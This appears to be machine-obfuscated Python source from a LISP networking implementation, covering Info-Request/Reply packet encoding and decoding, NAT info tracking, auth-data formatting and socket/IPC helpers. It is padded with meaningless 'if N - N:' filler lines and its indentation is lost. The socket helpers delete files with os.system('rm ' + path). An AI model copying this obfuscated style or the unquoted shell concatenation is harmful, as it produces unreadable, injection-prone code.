if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if 58 - 58: OOooOOo
if 72 - 72: OoO0O00 + OOooOOo - Oo0Ooo % ooOoO0o . IiII
if 95 - 95: iII111i % OOooOOo - IiII - OoOoOO00 % o0oOOo0O0Ooo * O0
if 16 - 16: I1Ii111 / Oo0Ooo
if 48 - 48: Oo0Ooo / oO0o + iII111i % iII111i
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 30 - 30: OoooooooOO - iIii1I11I1II1 / oO0o * Ii1I / Ii1I
if 52 - 52: OoOoOO00 - OoO0O00 + I1IiiI + IiII
if 49 - 49: oO0o / I11i - oO0o
if 31 - 31: OoOoOO00 + I1IiiI + I1ii11iIi11i + I11i * II111iiii % oO0o
if 90 - 90: OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
if 46 - 46: o0oOOo0O0Ooo
if 28 - 28: i1IIi
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
if 62 - 62: I1Ii111 * I11i / I11i
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
if 94 - 94: iII111i
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
if 62 - 62: Ii1I * OoOoOO00
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
class lisp_info ( ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
def print_info ( self ) :
if ( self . info_reply ) :
i1IiiI1i = "Info-Reply"
OooO0ooO0o0OO = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# OoooooooOO % iII111i
# II111iiii % II111iiii + O0 - i11iIiiIii
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : OooO0ooO0o0OO += "empty, "
for O0O0 in self . rtr_list :
OooO0ooO0o0OO += red ( O0O0 . print_address_no_iid ( ) , False ) + ", "
if 80 - 80: I11i * oO0o % iIii1I11I1II1 / iII111i
OooO0ooO0o0OO = OooO0ooO0o0OO [ 0 : - 2 ]
else :
i1IiiI1i = "Info-Request"
O0oo0OoOO = "<none>" if self . hostname == None else self . hostname
OooO0ooO0o0OO = ", hostname: {}" . format ( blue ( O0oo0OoOO , False ) )
if 58 - 58: II111iiii . I1IiiI . i1IIi
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( i1IiiI1i , False ) ,
lisp_hex_string ( self . nonce ) , OooO0ooO0o0OO ) )
if 60 - 60: iIii1I11I1II1 + ooOoO0o * i11iIiiIii + OoooooooOO
if 43 - 43: I1ii11iIi11i % Oo0Ooo - i11iIiiIii / I1Ii111 * i1IIi
def encode ( self ) :
i1IiIiiiii11 = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : i1IiIiiiii11 |= ( 1 << 27 )
if 78 - 78: o0oOOo0O0Ooo / OOooOOo / oO0o
if 9 - 9: IiII + O0 / I1IiiI
if 92 - 92: OOooOOo / i11iIiiIii + OoooooooOO
if 9 - 9: iII111i
if 9 - 9: O0 / o0oOOo0O0Ooo / I11i - i11iIiiIii - iII111i / IiII
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "Q" , self . nonce )
ii1i1II += struct . pack ( "III" , 0 , 0 , 0 )
if 46 - 46: IiII + OoooooooOO % I1IiiI
if 51 - 51: I1IiiI * I1Ii111 . i11iIiiIii % Oo0Ooo . i1IIi - oO0o
if 56 - 56: Oo0Ooo / II111iiii
if 76 - 76: OoOoOO00 % OoO0O00 * O0
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
ii1i1II += struct . pack ( "H" , 0 )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
ii1i1II += self . hostname + "\0"
if 39 - 39: ooOoO0o / iII111i
return ( ii1i1II )
if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
if 59 - 59: I11i % Ii1I / OoOoOO00
if 99 - 99: Ii1I + II111iiii / i11iIiiIii - IiII / iII111i + iII111i
if 55 - 55: IiII + OoooooooOO * I1ii11iIi11i . IiII * I1ii11iIi11i + IiII
if 81 - 81: iIii1I11I1II1 . ooOoO0o + OoOoOO00
oO0oO00 = socket . htons ( LISP_AFI_LCAF )
iiii1II = LISP_LCAF_NAT_TYPE
o00O0oOO0o = socket . htons ( 16 )
i1IIIoOoO00 = socket . htons ( self . ms_port )
Oo0OOO0OO = socket . htons ( self . etr_port )
ii1i1II += struct . pack ( "HHBBHHHH" , oO0oO00 , 0 , iiii1II , 0 , o00O0oOO0o ,
i1IIIoOoO00 , Oo0OOO0OO , socket . htons ( self . global_etr_rloc . afi ) )
ii1i1II += self . global_etr_rloc . pack_address ( )
ii1i1II += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
ii1i1II += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : ii1i1II += struct . pack ( "H" , 0 )
if 60 - 60: I11i * i1IIi + OoO0O00 . i11iIiiIii - OoO0O00 % OoO0O00
if 46 - 46: Ii1I + I1ii11iIi11i / iIii1I11I1II1 % i1IIi
if 47 - 47: Ii1I % OoO0O00
if 68 - 68: I1Ii111
for O0O0 in self . rtr_list :
ii1i1II += struct . pack ( "H" , socket . htons ( O0O0 . afi ) )
ii1i1II += O0O0 . pack_address ( )
if 76 - 76: I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * i1IIi / i1IIi
return ( ii1i1II )
if 69 - 69: iIii1I11I1II1 . I1Ii111 - Oo0Ooo / iII111i % IiII
if 84 - 84: ooOoO0o + i1IIi / Oo0Ooo * iIii1I11I1II1 + o0oOOo0O0Ooo + Oo0Ooo
def decode ( self , packet ) :
IiIIIii1iIII1 = packet
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 78 - 78: o0oOOo0O0Ooo . I11i / Ii1I . IiII
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = i1IiIiiiii11 [ 0 ]
packet = packet [ oO0o00O : : ]
if 27 - 27: I1IiiI % Ii1I - iIii1I11I1II1 + ooOoO0o
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 64 - 64: i11iIiiIii - Oo0Ooo / iIii1I11I1II1 / I1IiiI % ooOoO0o
OO00OO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 42 - 42: Oo0Ooo * OoOoOO00 % ooOoO0o * oO0o - Oo0Ooo + OOooOOo
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 )
self . nonce = OO00OO [ 0 ]
self . info_reply = i1IiIiiiii11 & 0x08000000
self . hostname = None
packet = packet [ oO0o00O : : ]
if 5 - 5: OoooooooOO * O0 / I1Ii111 + ooOoO0o . I1Ii111
if 57 - 57: ooOoO0o * OOooOOo % OoOoOO00 - OoOoOO00 - o0oOOo0O0Ooo * i1IIi
if 80 - 80: iII111i
if 81 - 81: OoooooooOO % OoOoOO00 % Oo0Ooo - I1IiiI
if 43 - 43: o0oOOo0O0Ooo % o0oOOo0O0Ooo
o00OooooOOOO = "HH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 48 - 48: O0
if 5 - 5: OOooOOo / i11iIiiIii . I11i % OOooOOo
if 1 - 1: II111iiii + O0 * OoOoOO00 / IiII . O0
if 87 - 87: IiII + I1IiiI
if 74 - 74: OoO0O00 + OoO0O00 % iII111i / I11i / O0
o0O , iI1i1i1i1i = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if ( iI1i1i1i1i != 0 ) : return ( None )
if 54 - 54: o0oOOo0O0Ooo / OoooooooOO * ooOoO0o . OoOoOO00 - I1Ii111
packet = packet [ oO0o00O : : ]
o00OooooOOOO = "IBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 69 - 69: oO0o - OoO0O00
oo0OOoOO0 , O0Ooo000Ooo , O0ooOo , oOOoooOO0O = struct . unpack ( o00OooooOOOO ,
packet [ : oO0o00O ] )
if 14 - 14: I1ii11iIi11i + iII111i . I11i . Oo0Ooo
if ( oOOoooOO0O != 0 ) : return ( None )
packet = packet [ oO0o00O : : ]
if 24 - 24: OoO0O00 * II111iiii . OoooooooOO - I1IiiI + OoooooooOO
if 91 - 91: oO0o * I1IiiI + iIii1I11I1II1
if 43 - 43: OoO0O00 - II111iiii
if 17 - 17: Ii1I
if ( self . info_reply == False ) :
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) >= oO0o00O ) :
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
if ( socket . ntohs ( oO0oO00 ) == LISP_AFI_NAME ) :
packet = packet [ oO0o00O : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 34 - 34: IiII / ooOoO0o * II111iiii * iII111i % OoooooooOO - iIii1I11I1II1
if 61 - 61: OOooOOo - OOooOOo / ooOoO0o * I1Ii111
return ( IiIIIii1iIII1 )
if 73 - 73: OoO0O00 * Ii1I
if 49 - 49: OoooooooOO / oO0o / I1IiiI + o0oOOo0O0Ooo * ooOoO0o . Oo0Ooo
if 48 - 48: I11i + IiII / IiII
if 65 - 65: I1ii11iIi11i - i1IIi % oO0o * iIii1I11I1II1 - IiII + ooOoO0o
if 63 - 63: i11iIiiIii - OOooOOo . OoOoOO00 + IiII . OoO0O00
o00OooooOOOO = "HHBBHHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 70 - 70: iIii1I11I1II1 % OoooooooOO / OoO0O00 . O0 - I11i % II111iiii
oO0oO00 , OoOO0OOOO0 , iiii1II , O0Ooo000Ooo , o00O0oOO0o , i1IIIoOoO00 , Oo0OOO0OO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 84 - 84: OOooOOo * i1IIi . iIii1I11I1II1 * iII111i + I1Ii111 + II111iiii
if 97 - 97: Ii1I - IiII
if ( socket . ntohs ( oO0oO00 ) != LISP_AFI_LCAF ) : return ( None )
if 64 - 64: oO0o . ooOoO0o / ooOoO0o - II111iiii
self . ms_port = socket . ntohs ( i1IIIoOoO00 )
self . etr_port = socket . ntohs ( Oo0OOO0OO )
packet = packet [ oO0o00O : : ]
if 81 - 81: I1ii11iIi11i
if 64 - 64: oO0o * OoO0O00 / OOooOOo + Ii1I % Oo0Ooo . IiII
if 2 - 2: I1Ii111 + I11i
if 47 - 47: i11iIiiIii + iIii1I11I1II1 % I1ii11iIi11i - oO0o % OoO0O00
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 85 - 85: oO0o * OoOoOO00 / OoOoOO00
if 85 - 85: OOooOOo / I1Ii111 . i1IIi / OoOoOO00 + iIii1I11I1II1
if 71 - 71: OoO0O00
if 96 - 96: I1ii11iIi11i / I1IiiI - I1ii11iIi11i / II111iiii - IiII
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( oO0oO00 )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 74 - 74: Ii1I * OoooooooOO % OOooOOo + OoooooooOO + iII111i
if 83 - 83: i1IIi
if 2 - 2: i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
if ( len ( packet ) < oO0o00O ) : return ( IiIIIii1iIII1 )
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( oO0oO00 )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( IiIIIii1iIII1 )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if ( len ( packet ) < oO0o00O ) : return ( IiIIIii1iIII1 )
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( oO0oO00 )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( IiIIIii1iIII1 )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 14 - 14: iII111i / OoO0O00
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
while ( len ( packet ) >= oO0o00O ) :
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 == 0 ) : continue
O0O0 = lisp_address ( socket . ntohs ( oO0oO00 ) , "" , 0 , 0 )
packet = O0O0 . unpack_address ( packet )
if ( packet == None ) : return ( IiIIIii1iIII1 )
O0O0 . mask_len = O0O0 . host_mask_len ( )
self . rtr_list . append ( O0O0 )
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
return ( IiIIIii1iIII1 )
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
class lisp_nat_info ( ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
def timed_out ( self ) :
o0O0oO0 = time . time ( ) - self . uptime
return ( o0O0oO0 >= ( LISP_INFO_INTERVAL * 2 ) )
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
class lisp_info_source ( ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: i1IIi % I11i % OoOoOO00
def cache_address_for_info_source ( self ) :
iII1 = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ iII1 ] = self
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
if 64 - 64: OoooooooOO
if 25 - 25: IiII
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 78 - 78: I1ii11iIi11i - OoooooooOO + O0
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 15 - 15: I1ii11iIi11i / IiII % I1IiiI
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 16 - 16: Ii1I
if 26 - 26: o0oOOo0O0Ooo / I11i + OoOoOO00 / OoOoOO00
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
iIIiiiIiiii11 = auth1 + auth2 + auth3
if 31 - 31: I1Ii111
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
iIIiiiIiiii11 = auth1 + auth2 + auth3 + auth4
if 84 - 84: i11iIiiIii * OOooOOo . iII111i - Ii1I * i1IIi - I1ii11iIi11i
return ( iIIiiiIiiii11 )
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
if 52 - 52: IiII
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
OoO0o = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 84 - 84: OoooooooOO
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
OoO0o = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 76 - 76: O0 / i11iIiiIii - OoOoOO00
OoO0o . bind ( ( local_addr , int ( port ) ) )
else :
oOo0oooo = port
if ( os . path . exists ( oOo0oooo ) ) :
os . system ( "rm " + oOo0oooo )
time . sleep ( 1 )
if 95 - 95: i11iIiiIii % i11iIiiIii
OoO0o = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
OoO0o . bind ( oOo0oooo )
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
return ( OoO0o )
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
OoO0o = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 28 - 28: I1Ii111
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
OoO0o = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 27 - 27: iII111i * I1IiiI
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
OoO0o = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
OoO0o . bind ( internal_name )
if 60 - 60: i1IIi / I1IiiI - I1ii11iIi11i
return ( OoO0o )
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
if 73 - 73: I11i / I1IiiI - IiII - i1IIi * IiII - OOooOOo
if 39 - 39: I11i . ooOoO0o * II111iiii
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
if 45 - 45: II111iiii
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
if 84 - 84: o0oOOo0O0Ooo
if 40 - 40: OoooooooOO - oO0o / O0 * I1Ii111 . O0 + i11iIiiIii
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
def lisp_packet_ipc ( packet , source , sport ) :
return ( ( "packet@" + str ( len ( packet ) ) + "@" + source + "@" + str ( sport ) + "@" + packet ) )
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
return ( "control-packet@" + dest + "@" + str ( dport ) + "@" + packet )
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
if 74 - 74: i1IIi
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
def lisp_data_packet_ipc ( packet , source ) :
return ( "data-packet@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
if 35 - 35: i11iIiiIii + oO0o
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
def lisp_command_ipc ( packet , source ) :
return ( "command@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
def lisp_api_ipc ( source , data ) :
return ( "api@" + str ( len ( data ) ) + "@" + source + "@@" + data )
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
if 85 - 85: OoooooooOO * ooOoO0o
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
def lisp_ipc ( packet , send_socket , node ) :
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 85 - 85: I11i % IiII
